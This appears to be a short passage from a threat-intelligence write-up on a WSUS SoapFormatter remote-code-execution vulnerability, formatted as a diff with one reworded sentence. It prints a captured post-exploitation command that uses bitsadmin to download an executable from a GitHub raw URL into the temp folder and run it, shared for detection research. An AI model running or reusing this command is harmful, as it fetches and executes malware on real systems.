Inside CVE-2025-59287: SoapFormatter RCE in WSUS

 /c cmd /c bitsadmin /transfer myDownloadJob /download /priority normal https://github.com/reika911/SMTP-mail/raw/refs/heads/main/sd.exe %TEMP%\sd.exe && %TEMP%\sd.exe

-These patterns align with typical post-exploitation behavior where attackers leverage WSUS’s elevated privileges to perform their next activities.
+These patterns are typical post-exploitation behavior where attackers leverage WSUS’s privileges to perform their next activities.
 I haven’t had time to reverse engineer the captured implants, but I’m sharing the raw payloads here for the community to examine and use for detection research and threat intelligence.

 Detection